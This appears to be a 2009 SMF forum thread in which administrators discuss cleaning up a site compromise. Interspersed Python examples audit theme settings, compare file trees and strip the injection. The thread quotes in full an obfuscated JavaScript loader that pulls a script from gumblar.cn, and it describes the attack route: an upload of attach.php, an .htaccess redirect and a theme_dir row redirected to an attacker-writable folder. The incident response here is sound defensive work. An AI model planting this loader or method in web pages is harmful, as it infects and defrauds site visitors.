Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM


Agafonov

Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (unless other ones are used by your mods; I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.
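
The theme_dir row Agafonov refers to can be audited straight from the database rather than through the admin panel. The following is an added example, not SMF's own code and not anything posted in this thread. It assumes the SMF 1.1-style table layout (ID_MEMBER, ID_THEME, variable, value), that every legitimate theme lives under <boarddir>/Themes on disk and <boardurl>/Themes on the web, and it works on rows constructed in an in-memory SQLite database; the table prefix, paths and URLs are illustrative.

```python
"""Added example (not SMF's code): audit the theme_dir rows Agafonov refers to.

Assumes the SMF 1.1-style table layout (ID_MEMBER, ID_THEME, variable, value)
and that every legitimate theme lives under <boarddir>/Themes on disk and
<boardurl>/Themes on the web. Any theme_dir, theme_url or images_url pointing
elsewhere is reported, so a theme whose directory has been redirected to a
location the attacker can write to shows up even though the admin panel looks
normal. The rows at the bottom are constructed for the demo; on a real forum
run QUERY against MySQL with the site's own table prefix."""
import posixpath
import sqlite3
from typing import List, Tuple

QUERY = """
SELECT ID_THEME, ID_MEMBER, variable, value
FROM {prefix}themes
WHERE variable IN ('theme_dir', 'theme_url', 'images_url')
ORDER BY ID_THEME, ID_MEMBER, variable
"""


def _inside(value: str, root: str, is_path: bool) -> bool:
    """Lexical containment check. Paths are normalised so 'Themes/../attachments'
    does not pass; URLs are compared case-insensitively on the prefix."""
    if is_path:
        v, r = posixpath.normpath(value), posixpath.normpath(root)
        return v == r or v.startswith(r + "/")
    v, r = value.lower().rstrip("/"), root.lower().rstrip("/")
    return v == r or v.startswith(r + "/")


def suspicious_theme_rows(conn, boarddir: str, boardurl: str,
                          prefix: str = "smf_") -> List[Tuple[int, int, str, str]]:
    """Rows whose directory/URL does not resolve under the Themes root."""
    dir_root = boarddir.rstrip("/") + "/Themes"
    url_root = boardurl.rstrip("/") + "/Themes"
    bad = []
    for id_theme, id_member, variable, value in conn.execute(QUERY.format(prefix=prefix)):
        is_path = variable == "theme_dir"
        if not _inside(value, dir_root if is_path else url_root, is_path):
            bad.append((id_theme, id_member, variable, value))
    return bad


def build_demo() -> sqlite3.Connection:
    """Constructed sample: theme 1 is sane; theme 2 points straight at the
    attachments directory; theme 3 hides the same thing behind '..'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE smf_themes "
                 "(ID_MEMBER INTEGER, ID_THEME INTEGER, variable TEXT, value TEXT)")
    conn.executemany("INSERT INTO smf_themes VALUES (?, ?, ?, ?)", [
        (0, 1, "name", "SMF Default Theme"),
        (0, 1, "theme_dir", "/var/www/forum/Themes/default"),
        (0, 1, "theme_url", "http://example.com/forum/Themes/default"),
        (0, 1, "images_url", "http://example.com/forum/Themes/default/images"),
        (0, 2, "theme_dir", "/var/www/forum/attachments"),
        (0, 2, "theme_url", "http://example.com/forum/attachments"),
        (0, 3, "theme_dir", "/var/www/forum/Themes/default/../../attachments"),
        (0, 3, "theme_url", "http://example.com/forum/Themes/default"),
    ])
    return conn


if __name__ == "__main__":
    for row in suspicious_theme_rows(build_demo(), "/var/www/forum", "http://example.com/forum"):
        print("suspicious:", row)
```

Themes 2 and 3 are reported; theme 1 is not. Compare every reported value against the directories you actually installed, and treat a theme_dir that points into a directory the web server lets users upload to as the thing to remove before re-uploading files.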

Edvard

Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it with a clean backup. Somehow, either through the PHP script or via the rootkit/hacktool on my admin PC, the FTP server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin PC is virus- and malware-free. Then delete your whole forum (make a backup of the infected forum if you wish; I did, so I could put non-infected avatars and attachments, as well as other changes, back online), change the FTP and MySQL server passwords, and upload clean forum software.

And the most important lesson I've learnt is: MAKE BACKUPS! This will be the last time I have to resort to a backup made almost one and a half years ago. I suggest making backups every time you change some of the PHP or HTML files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.

Tiribulus

#162
Quote from: Agafonov on May 14, 2009, 02:29:55 AM
<<< But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?

stevefdl

I got hacked with a JavaScript snippet between the head and body of my site. I tried reinstalling, but nothing seems to work. The code is still there... anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
--></script>
<body>
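
The script stevefdl pasted can be decoded without ever running it: it swaps every '#' for '%', URL-decodes the result with unescape(), and then eval()s it, so repeating the first two steps in Python exposes the second stage statically. This is an added example, not code from the thread or from SMF; the SAMPLE string is the encoded payload copied verbatim from the post above, and the helper and regex names are illustrative.

```python
"""Added example (not from the thread): decode the injected script quoted above
without running it. The script replaces every '#' with '%' and passes the result
to unescape() and then eval(); repeating the first two steps in Python reveals
the second-stage loader statically. SAMPLE is the encoded string copied verbatim
from the post above; everything else here is illustrative code."""
import re
from typing import List
from urllib.parse import unquote

# Encoded payload copied verbatim from the injected <script> in the post above.
SAMPLE = ("var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d")


def decode_payload(encoded: str, marker: str = "#") -> str:
    """Same transform as the script's replace(/#/g,'%') + unescape(), minus the eval."""
    return unquote(encoded.replace(marker, "%"))


# <script src=//host/...> or <script src=http://host/...> inside the decoded code.
_SRC_RE = re.compile(r"<script\s+src=(?:https?:)?//([^/\"'\s>]+)", re.I)


def external_hosts(decoded: str) -> List[str]:
    """Hosts the decoded loader pulls a further script from (the indicator to block)."""
    return sorted(set(_SRC_RE.findall(decoded)))


# The wrapper shape from the post: var X='<encoded>';var Y=X.replace(/#/g,'%');...
_WRAPPER_RE = re.compile(r"var\s+\w+='([^']*)';var\s+\w+=\w+\.replace\(/#/g,'%'\)")


def decode_page(html: str) -> List[str]:
    """Find every such wrapper in a page (one per injection) and decode each payload."""
    return [decode_payload(m) for m in _WRAPPER_RE.findall(html)]


if __name__ == "__main__":
    decoded = decode_payload(SAMPLE)
    print(decoded)
    print("loads from:", external_hosts(decoded))
```

The decoded text begins `var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;` and ends with a `document.write` that inserts `<script src=//gumblar.cn/rss/?id=...>`, gated on a Windows user agent that is not "NT 6", the absence of a `miek=1` cookie, and a once-only guard variable. The host in that `src` is what to look for in proxy logs and to block; the decoded code is never executed by this script.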

Filipina

Quote from: Agafonov on May 14, 2009, 02:29:55 AM
Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (unless other ones are used by your mods; I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

Ok, thanks for the information. I did a search today of the two main usernames being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming", it must be too late for them. My registration will just remain closed until a patch comes out, because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl it and find that mess. It is truly sad.

Kindred

Actually, the statement is slightly incorrect.

Uploading a clean set of files *WILL* help and will solve your immediate problems with the forum. It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."
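
Kindred's distinction (a clean upload overwrites what exists in the release but leaves behind what the attacker added) can be checked mechanically by comparing the deployed tree with an unpacked copy of the same release. The following is an added example, not SMF's own code: it assumes that Settings.php and the attachments/ and avatars/ directories are the only legitimately site-specific content, that nothing executable belongs under the upload directories, and it builds two small constructed trees in temporary directories to demonstrate the report.

```python
"""Added example (not SMF's code): what Kindred's distinction looks like in practice.

Re-uploading a clean SMF release overwrites the files that exist in the release;
it leaves behind whatever the attacker ADDED. This hashes every file in a clean
copy of the release and in the deployed tree and reports files only the deployed
tree has, files whose content differs, files the deployed tree lacks, and
executable content under the upload directories. Settings.php and the
attachments/avatars directories are assumed to be legitimately site-specific and
are listed separately rather than flagged. The two trees at the bottom are
constructed for the demo."""
import hashlib
import os
import tempfile
from typing import Dict, List

SITE_SPECIFIC = ("Settings.php", "Settings_bak.php", "attachments/", "avatars/")  # assumed
UPLOAD_DIRS = ("attachments/", "avatars/")
EXEC_SUFFIXES = (".php", ".php3", ".php4", ".php5", ".phtml", ".htaccess")


def _hash_tree(root: str) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 of content, for every file under root."""
    out = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def _site_specific(rel: str) -> bool:
    return any(rel == p or rel.startswith(p) for p in SITE_SPECIFIC)


def compare_trees(clean_root: str, deployed_root: str) -> Dict[str, List[str]]:
    """Classify every deployed file against the clean release."""
    clean, deployed = _hash_tree(clean_root), _hash_tree(deployed_root)
    report = {"added": [], "modified": [], "missing": [],
              "exec_in_uploads": [], "site_specific": []}
    for rel, digest in sorted(deployed.items()):
        # Upload directories may hold data only; any PHP or .htaccess there is hostile.
        if rel.startswith(UPLOAD_DIRS) and rel.rsplit("/", 1)[-1].endswith(EXEC_SUFFIXES):
            report["exec_in_uploads"].append(rel)
        if rel not in clean:
            report["site_specific" if _site_specific(rel) else "added"].append(rel)
        elif clean[rel] != digest:
            report["site_specific" if _site_specific(rel) else "modified"].append(rel)
    report["missing"] = sorted(set(clean) - set(deployed))
    return report


def _put(root: str, rel: str, text: str) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_demo() -> Dict[str, List[str]]:
    """Constructed sample: a three-file 'release' and a deployed copy with a
    script appended to index.php, a stray Sources/extra.php, and a PHP file plus
    .htaccess dropped into attachments/. The file bodies are placeholders."""
    clean = tempfile.mkdtemp(prefix="smf_release_")
    deployed = tempfile.mkdtemp(prefix="smf_deployed_")
    for root in (clean, deployed):
        _put(root, "index.php", "<?php require 'SSI.php';\n")
        _put(root, "Sources/Load.php", "<?php // loader\n")
    _put(clean, "Sources/Security.php", "<?php // security\n")
    _put(clean, "Settings.php", "<?php $db_passwd = '';\n")
    _put(deployed, "Settings.php", "<?php $db_passwd = 'site-specific';\n")
    _put(deployed, "index.php", "<?php require 'SSI.php';\n<script>/* injected */</script>\n")
    _put(deployed, "Sources/extra.php", "<?php /* constructed stand-in for an added file */\n")
    _put(deployed, "attachments/attach.php", "<?php /* constructed stand-in for an uploaded script */\n")
    _put(deployed, "attachments/.htaccess", "RewriteEngine On\n")
    return compare_trees(clean, deployed)


if __name__ == "__main__":
    for key, files in build_demo().items():
        print(key, files)
```

Everything under "added" and "exec_in_uploads" is what a re-upload would leave in place; "modified" is what it fixes. Unpack the exact release version you run for the clean tree, otherwise legitimate version differences show up as modifications.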

Jorin

Quote from: JBlaze™ on May 12, 2009, 04:29:52 PM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on an SMF basis". ;)

crash56

Quote from: nehcregit on May 15, 2009, 02:30:10 AM
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on an SMF basis". ;)

They're working on it. Kindred posted that they're working on a fix. It's on page 8 of this thread.

No ETA yet.

Jorin


Aleksi "Lex" Kilpinen

#169
Krisbarteo registered on my forum today:

krisbarteo - [email protected] - 94.142.129.147 - Today at 12:58:32

The "Stop Spammer" mod marked all profile details as spammer and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as the IP,
and I have a gender option on registration, and krisbarteo selected male ;D
Glory to Ukraine!


"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

agridoc

#170
One important thing that I have not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded (http://www.motobit.com/util/base64-decoder-encoder.asp).

The longest path in the domain's directory is used and many garbage files are added there. I had to use a shell to find and keep this file for examination, as there are file limitations in FTP and the control panel file manager. The file can be decoded to see what else could have been done.

If there is no recent backup, each PHP file has to be opened and the injected code deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search for (the injected code).
- Search the domain recursively for PHP files and build an array.
- Use this array to open and search each PHP file and, if the string is found, delete it (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.
For Greek aeromodellers and our friends around the world - Greek Button sets for SMF - Greeklish to Greek mod
I don't spend time on messages written in Greeklish.
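
The script agridoc asks for, as an added example that is not from the thread or from SMF: it walks a directory, finds the files containing the injected code, copies each one to <name>.bak and strips every occurrence. The injection can be given as the literal string agridoc describes, or as a regular expression; the regex below is built from the shape of the injection quoted earlier in this thread with the variable names and encoded string as wildcards, and it is an assumption that this covers the variants on any given site. The file list and contents at the bottom are constructed for the demo.

```python
"""Added example (not from the thread): the cleaning script agridoc describes.

Walks a directory, finds files containing the injected code, and removes it.
The injection can be a literal string or a compiled regular expression; the
regex below matches the shape of the injection quoted earlier in this thread,
with variable names and the encoded string as wildcards, because those change
between files. Every file that would change is copied to <name>.bak first.
Run with dry_run=True and review the report before running it for real."""
import os
import re
import shutil
import tempfile
from typing import List, Tuple

# Shape of the quoted injection:
#   <script language=javascript><!-- (function(){var A='..';var B=A.replace(/#/g,'%');
#   var C=unescape(B);eval(C)})(); --></script>
# Assumed to cover the variants on a given site; confirm against a real infected file.
INJECTION_RE = re.compile(
    r"<script\s+language=javascript>\s*<!--\s*"
    r"\(function\(\)\{var\s+\w+='[^']*';var\s+\w+=\w+\.replace\(/#/g,'%'\);"
    r"var\s+\w+=unescape\(\w+\);eval\(\w+\)\}\)\(\);\s*-->\s*</script>[ \t]*\r?\n?",
    re.I,
)

SUFFIXES = (".php", ".html", ".htm", ".js")  # assumed: file types worth scanning


def _files(root: str) -> List[str]:
    out = []
    for dirpath, _dirs, names in os.walk(root):
        out.extend(os.path.join(dirpath, n) for n in names if n.endswith(SUFFIXES))
    return sorted(out)


def _strip(data: str, needle) -> Tuple[str, int]:
    """(cleaned text, number of removals) for a str or compiled-regex needle."""
    if isinstance(needle, str):
        return data.replace(needle, ""), data.count(needle)
    return needle.subn("", data)


def _read(path: str) -> str:
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        return fh.read()


def find_infected(root: str, needle) -> List[str]:
    """Relative paths of scanned files that contain the needle."""
    return [os.path.relpath(p, root).replace(os.sep, "/")
            for p in _files(root) if _strip(_read(p), needle)[1]]


def clean_tree(root: str, needle, dry_run: bool = True) -> List[Tuple[str, int]]:
    """Strip every occurrence; returns (relative path, removals) per file touched."""
    report = []
    for path in _files(root):
        cleaned, n = _strip(_read(path), needle)
        if not n:
            continue
        if not dry_run:
            shutil.copy2(path, path + ".bak")
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
        report.append((os.path.relpath(path, root).replace(os.sep, "/"), n))
    return report


def file_text(root: str, rel: str) -> str:
    return _read(os.path.join(root, *rel.split("/")))


# Constructed sample contents: the quoted wrapper around a placeholder encoded string.
INFECTED = ("<?php\n$x = 1;\n?>\n</head><script language=javascript><!--\n"
            "(function(){var FopJ='var#20a';var uy5=FopJ.replace(/#/g,'%');"
            "var Bsiy=unescape(uy5);eval(Bsiy)})();\n--></script>\n<body>\n")
CLEAN = "<?php\n$x = 1;\n?>\n</head><body>\n"


def build_demo() -> str:
    """Constructed sample tree: one infected file and one clean template."""
    root = tempfile.mkdtemp(prefix="smf_cleaner_demo_")
    os.makedirs(os.path.join(root, "Themes", "default"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(INFECTED)
    with open(os.path.join(root, "Themes", "default", "index.template.php"), "w") as fh:
        fh.write(CLEAN)
    return root


if __name__ == "__main__":
    root = build_demo()
    print("dry run:", clean_tree(root, INJECTION_RE, dry_run=True))
    print("cleaned:", clean_tree(root, INJECTION_RE, dry_run=False))
```

Removing the injected block does not remove whatever wrote it; the file the decoded script points to, and the theme_dir row discussed earlier, still have to be dealt with, or the injection comes back.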

sponna

We got hit slightly differently, it seems. The attacker managed to upload a file "attach.php" into the attachments directory together with the avatar exploit. He then created an .htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code, into which many different versions of drug-selling stores were loaded. All of these URLs were accessed from the attachments directory in the forum via the redirect in the .htaccess file.

I'm still trying to work out what sequence of events led to the compromise, but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled, so I'm not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of URLs and indexed them; we knew something was wrong when our bandwidth went sky high.

Samker

I also found "KrisBarteo" in the member base, but it looks like he didn't succeed in hacking us... At least I don't see anything unusual with my SCForum.

Can somebody please also check (and verify) that everything is OK with the forum?

http://www.SCforum.info

Thanks in advance!

S.
Samker's Computer Forum - SCforum.info

Sarge

Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.

    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Dzonny

Quote from: Sarge on May 15, 2009, 04:18:02 PM
Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
I agree... ;)

Samker

Thank you guys...  :D

I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have known about this "hole" for only a few hours??

I have tight settings (normal for a security forum, which is what I run); maybe I could help others with protection... I mean we could compare settings and find differences between installed mods, enabled features, etc.??

Best Regards,

S.


agridoc

Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) that everything is OK with the forum?

It might look OK but still be infected. Go in with FTP and check some PHP files. If there is no added code, it's probably not infected. Also check your error log.

Samker

Quote from: agridoc on May 15, 2009, 05:06:14 PM
Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) that everything is OK with the forum?

It might look OK but still be infected. Go in with FTP and check some PHP files. If there is no added code, it's probably not infected. Also check your error log.

I already double-checked all the mentioned things and everything seems OK.

Thanks for reply.

M-DVD

Quote from: Agafonov on May 14, 2009, 02:16:53 AM
Quote from: M-DVD on May 13, 2009, 11:23:37 PM
3. There is another problem: how do the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov; without your info I could never have found the trick >:(

Quote from: Agafonov on May 12, 2009, 06:02:29 PM
How the value of theme_dir appeared in smf_themes table - is the main question.

The guy is brilliant. I found the way only because I already knew that it exists and searched the site.

Quote from: Samker on May 15, 2009, 04:32:36 PM
I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have known about this "hole" for only a few hours??

Perhaps because the guy has been busy :P

Tiribulus

Quote from: M-DVD on May 15, 2009, 05:53:32 PM
<<< I found the way only because I already knew that it exists and searched the site. >>>

How would ya like to be a sterling citizen and share that with us? :)
